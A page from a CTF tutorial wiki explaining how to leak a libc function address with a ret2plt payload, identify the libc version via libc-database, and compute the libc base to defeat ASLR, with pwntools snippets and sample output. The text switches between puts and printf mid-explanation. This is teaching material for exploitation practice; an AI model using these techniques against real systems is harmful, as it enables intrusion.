🏳️
The CTF Recipes
  • Introduction
  • Cryptography
    • Introduction
    • General knowledge
      • Encoding
        • Character encoding
          • ASCII
          • Unicode
          • UTF-8
        • Data encoding
          • Base16
          • Base32
          • Base64
      • Maths
        • Modular arithmetic
          • Greatest Common Divisor
          • Fermat's little theorem
          • Quadratic residues
          • Tonelli-Shanks
          • Chinese Remainder Theorem
          • Modular binomial
      • Padding
        • PKCS#7
    • Misc
      • XOR
    • Mono-alphabetic substitution
      • Index of coincidence
      • frequency analysis
      • Well known algorithms
        • 🔴Scytale
        • 🔴ROT
        • 🔴Polybe
        • 🔴Vigenere
        • 🔴Pigpen cipher
        • 🔴Affine cipher
    • Symmetric Cryptography
      • AES
        • Block Encryption procedure
          • Byte Substitution
          • Shift Row
          • Mix Column
          • Add Key
          • Key Expansion / Key Schedule
        • Mode of Operation
          • ECB
            • Block shuffling
              • Challenge example
            • ECB Oracle
              • Challenge example
          • CBC
            • Bit flipping
              • Challenge example
            • Padding oracle
              • Challenge example
          • OFB
            • Key stream reconstruction
            • Encrypt to Uncrypt
  • 🛠️Pwn
    • General knowledge
      • STACK
        • Variables storage
        • Stack frame
      • PLT and GOT
      • HEAP
        • HEAP operations
        • Chunk
        • Bins
        • Chunk allocation and reallocation
      • Syscall
    • Architectures
      • aarch32
        • Registers
        • Instruction set
        • Calling convention
      • aarch64
        • Registers
        • Instruction set
        • Calling convention
      • mips32
        • Registers
        • Instruction set
        • Calling convention
      • mips64
        • Registers
        • Instruction set
        • Calling convention
      • x86 / x64
        • Registers
        • Instruction set
        • Calling convention
    • Stack exploitation
      • Stack Buffer Overflow
        • Dangerous functions
          • gets
          • memcpy
          • sprintf
          • strcat
          • strcpy
        • Basics
          • Challenge example
        • Instruction pointer Overwrite
          • Challenge example
        • De Bruijn Sequences
        • Stack reading
          • Challenge example
      • Format string
        • Dangerous functions
          • printf
          • fprintf
        • Placeholder
        • Data Leak
          • Challenge example
        • Data modification
          • Challenge example
      • Arbitrary code execution
        • Shellcode
        • ret2reg
        • Code reuse attack
          • Ret2plt
          • Ret2dlresolve
          • GOT Overwrite
          • Ret2LibC
          • Leaking LibC
          • Ret2csu
          • Return Oriented Programming - ROP
          • Sigreturn Oriented Programming - SROP
          • Blind Return Oriented Programming - BROP
            • Challenge example
          • 🔴Call Oriented Programming - COP
          • 🔴Jump Oriented Programming - JOP
          • One gadget
        • Stack pivoting
    • 🛠️Heap exploitation
      • Heap overflow
        • Challenge example
      • Use after free
        • Challenge example
      • 🛠️Double free
      • 🔴Unlink exploit
    • Protections
      • Stack Canaries
      • No eXecute
      • PIE
      • ASLR
      • RELRO
    • Integer overflow
Powered by GitBook
On this page
  • Leaking Libc function address
  • Finding LIBC library
  • Getting libc base address
  • Resources
  1. Pwn
  2. Stack exploitation
  3. Arbitrary code execution
  4. Code reuse attack

Leaking LibC

ASLR bypass

If the ASLR is enable, an address of a libc function will be leak in order to know the address of the others libc functions.

Leaking Libc function address

In order to obtain an address, the ret2plt attack can be used : 

from pwn import * 

elf = ELF('./chall')

payload = flat(
    b'A' * padding,
    elf.plt['puts'],
    elf.symbols['main'],
    elf.got['puts']
)

Here the process will print the address of the puts function.

Finding LIBC library

To determine which version of the libc library is being used by the program, it is necessary to find which library version contains the 'puts' function at the given address.

This can be done by searching through the available library versions and comparing the addresses of the 'printf' function. Once the library version that contains the 'printf' function at the given address is found, it can be determined that this is the version of libc being used by the program.

$ ./find puts 0xf7d5f460
ubuntu-old-glibc (libc6_2.26-0ubuntu2.1_amd64)
ubuntu-old-glibc (libc6_2.26-0ubuntu2_amd64)
debian-glibc (libc6_2.31-13+deb11u5_i386)
ubuntu-old-eglibc (libc6-i386_2.13-20ubuntu5_amd64)

$ ./download libc6_2.26-0ubuntu2.1_amd64
Getting libc6_2.26-0ubuntu2.1_amd64
  -> Location: http://old-releases.ubuntu.com/ubuntu/pool/main/g/glibc//libc6_2.26-0ubuntu2.1_amd64.deb
  -> Downloading package
  -> Extracting package
  -> Package saved to libs/libc6_2.26-0ubuntu2.1_amd64

Other functions to leak

puts
printf
__libc_start_main
read
gets

Getting libc base address

libc = ELF("libs/libc6_2.26-0ubuntu2.1_amd64")

libc.address = leak - libc.symbols[func_name] #Save libc base
log.success("LIBC base @ %s" % hex(libc.address))

[+] LIBC base: 0xf7d70000

Note that final libc base address must end in 00. If that's not your case you might have leaked an incorrect library.

Resources

PreviousRet2LibCNextRet2csu

Last updated 2 years ago

Fortunately, several databases and tools are available to make this process easier such as "" or ""

🛠️
Libc database search engine
libc database
ROP - Leaking LIBC addressHackTricks
Logo